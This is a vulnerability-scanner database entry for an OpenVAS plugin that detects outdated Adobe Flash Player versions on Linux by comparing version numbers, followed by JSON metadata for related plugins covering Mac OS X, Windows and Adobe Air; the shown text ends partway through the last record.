Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)
2015-05-15T00:00:00
ID OPENVAS:1361412562310805619 Type openvas Reporter Copyright (C) 2015 Greenbone Networks GmbH Modified 2019-07-17T00:00:00
Description
This host is installed with Adobe Flash
Player and is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)
#
# Authors:
# Rinu <krinu@secpod.com>
#
# Copyright:
# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:adobe:flash_player";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.805619");
script_version("2019-07-17T11:14:11+0000");
script_cve_id("CVE-2015-3077", "CVE-2015-3078", "CVE-2015-3079", "CVE-2015-3080",
"CVE-2015-3081", "CVE-2015-3082", "CVE-2015-3083", "CVE-2015-3084",
"CVE-2015-3085", "CVE-2015-3086", "CVE-2015-3087", "CVE-2015-3088",
"CVE-2015-3089", "CVE-2015-3090", "CVE-2015-3091", "CVE-2015-3092",
"CVE-2015-3093");
script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)");
script_tag(name:"creation_date", value:"2015-05-15 12:39:35 +0530 (Fri, 15 May 2015)");
script_tag(name:"qod_type", value:"registry");
script_name("Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)");
script_tag(name:"summary", value:"This host is installed with Adobe Flash
Player and is prone to multiple vulnerabilities.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Multiple flaws exists due to,
- Improper validation of user supplied input.
- A flaw in the Broker that is due to the BrokerCreateFile method not properly
sanitizing user input.
- An integer overflow condition that is triggered as user-supplied input is
not properly validated.
- An overflow condition that is triggered as user-supplied input is not
properly validated.
- Multiple unspecified memory disclosure flaws in Adobe Flash Player.
- Multiple unspecified type confusion flaws in Adobe Flash Player.
- Multiple unspecified flaws in Adobe Flash Player.
- A a use-after-free error Adobe Flash Player.
- An unspecified TOCTOU flaw in Adobe Flash Player.");
script_tag(name:"impact", value:"Successful exploitation will allow a
context-dependent attacker to corrupt memory and potentially execute arbitrary
code, bypass security restrictions and gain access to sensitive information,
bypass protected mode, bypass validation mechanisms and write arbitrary data,
bypass the sandbox when chained with another vulnerability, bypass ASLR
protection mechanisms.");
script_tag(name:"affected", value:"Adobe Flash Player versions before
11.2.202.460 on Linux.");
script_tag(name:"solution", value:"Upgrade to Adobe Flash Player version
11.2.202.460 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
script_family("General");
script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
script_mandatory_keys("AdobeFlashPlayer/Linux/Ver");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
if(!playerVer = get_app_version(cpe:CPE)){
exit(0);
}
if(version_is_less(version:playerVer, test_version:"11.2.202.460"))
{
report = 'Installed version: ' + playerVer + '\n' +
'Fixed version: ' + "11.2.202.460" + '\n';
security_message(data:report);
exit(0);
}
{"id": "OPENVAS:1361412562310805619", "type": "openvas", "bulletinFamily": "scanner", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "published": "2015-05-15T00:00:00", "modified": "2019-07-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805619", "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "lastseen": "2019-07-19T22:13:10", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310121376", "OPENVAS:1361412562310851099", "OPENVAS:1361412562310805618", "OPENVAS:1361412562310805621", "OPENVAS:1361412562310805617", "OPENVAS:1361412562310805620"]}, {"type": "redhat", "idList": ["RHSA-2015:1005"]}, {"type": "nessus", "idList": ["SUSE_11_FLASH-PLAYER-150514.NASL", "REDHAT-RHSA-2015-1005.NASL", "GENTOO_GLSA-201505-02.NASL", "MACOSX_GOOGLE_CHROME_42_0_2311_152.NASL", "MACOSX_ADOBE_AIR_APSB15-09.NASL", "GOOGLE_CHROME_42_0_2311_152.NASL", "MACOSX_FLASH_PLAYER_APSA15-09.NASL", "FREEBSD_PKG_E206DF57F97B11E4B799C485083CA99C.NASL", "SMB_KB3061904.NASL", "ADOBE_AIR_APSB15-09.NASL"]}, {"type": "kaspersky", "idList": ["KLA10576", "KLA10574"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0914-1", "OPENSUSE-SU-2015:0890-1", "SUSE-SU-2015:0878-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14490"]}, {"type": "gentoo", "idList": ["GLSA-201505-02"]}, {"type": "freebsd", "idList": ["E206DF57-F97B-11E4-B799-C485083CA99C"]}, {"type": "cve", "idList": ["CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3083", "CVE-2015-3085", "CVE-2015-3091", "CVE-2015-3089", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3090", "CVE-2015-3088"]}, {"type": "exploitdb", "idList": ["EDB-ID:37840", "EDB-ID:37843", "EDB-ID:37841", "EDB-ID:37368", "EDB-ID:37845", "EDB-ID:37846", "EDB-ID:37844", "EDB-ID:37853", "EDB-ID:37842"]}, {"type": "zdt", "idList": ["1337DAY-ID-24089", "1337DAY-ID-24088", "1337DAY-ID-24084", "1337DAY-ID-24087", "1337DAY-ID-23766", "1337DAY-ID-24085", "1337DAY-ID-24083"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132383"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_SHADER_JOB_OVERFLOW"]}, {"type": "zdi", "idList": ["ZDI-15-216"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "GOOGLEPROJECTZERO:971269B316D34538F3E678FE9B6B6772"]}, {"type": "threatpost", "idList": ["THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3"]}, {"type": "hackerone", "idList": ["H1:73276"]}], "modified": "2019-07-19T22:13:10", "rev": 2}, "score": {"value": 10.3, "vector": "NONE", "modified": "2019-07-19T22:13:10", "rev": 2}, "vulnersScore": 10.3}, "pluginID": "1361412562310805619", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805619\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 12:39:35 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 11.2.202.460 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.460 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.460\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.460\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "naslFamily": "General"}
{"openvas": [{"lastseen": "2019-07-19T22:13:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-05-15T00:00:00", "id": "OPENVAS:1361412562310805618", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805618", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805618\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 12:35:31 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.289 or 17.0.0.188 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.289\"))\n{\n fix = \"13.0.0.289\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.169\"))\n{\n fix = \"17.0.0.188\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-05-15T00:00:00", "id": "OPENVAS:1361412562310805621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805621", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_may15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805621\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 14:07:44 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Air Multiple Vulnerabilities - 01 May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 17.0.0.172 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 17.0.0.172\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"17.0.0.172\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"17.0.0.172\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-05-15T00:00:00", "id": "OPENVAS:1361412562310805617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805617", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805617\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 10:48:48 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Improper validation of user supplied input.\n\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n\n - Multiple unspecified flaws in Adobe Flash Player.\n\n - A a use-after-free error Adobe Flash Player.\n\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.289 or 17.0.0.188 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.289\"))\n{\n fix = \"13.0.0.289\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.169\"))\n{\n fix = \"17.0.0.188\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-05-15T00:00:00", "id": "OPENVAS:1361412562310805620", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805620", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_may15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 